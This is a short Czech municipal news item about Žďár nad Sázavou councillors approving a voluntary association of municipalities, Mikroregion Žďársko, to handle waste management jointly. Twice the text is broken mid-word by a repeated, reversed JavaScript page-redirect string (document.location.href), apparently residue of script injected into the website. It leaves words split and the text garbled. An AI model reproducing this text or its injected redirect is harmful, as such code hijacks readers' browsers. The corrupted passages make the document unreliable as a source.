Rainbow page separator

Mikroregion Žďársko má společně řešit odpadové hospodářství

Úterý, 1. června 2021

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Založení dobrovolného svazku obcí Mikroregion Žďársko schválili žďárští radní. Jeho oficiální sídlo je navrženo v budově městského úřadu. Důvodem vzniku subjektu je především společné řešení problematiky odpadového hospodářství, přičemž spojení více obcí má zajistit silnější vyjednávací pozici při řešení té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to problematiky. Výhledově mohou být aktivity rozšířeny například i na dotační management, výběrová řízení a podobně. Obce ve žďárském správním obvodu, kterých je bezmála pět desítek, aktuálně na svých zastupitelstvech schvalují případný vstup do nového spolku, koncem června dojde k ustavující schůzi a poté budou ještě všechny členské obce schvalovat finální verzi stanov se smlouvou o založení svazku. Registrace Mikroregionu Žďársko je plánována na říjen.
Spolek Mikroregion Žďársko byl založen již v minulosti, konkrétně v roce 2001 – záhy se však rozpadl a činnost ukončil se zrušením okresních úřadů ke konci roku 2002. Snahy o jeho opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovné založení proběhly v roce 2017, nicméně záměr nebyl dokončen. Na území okresu funguje několik dobrovolných sdružení obcí, například Mikroregion Novoměstsko, Mikroregion Bystřicko či Mikroregion Velkomeziříčsko – Bítešsko.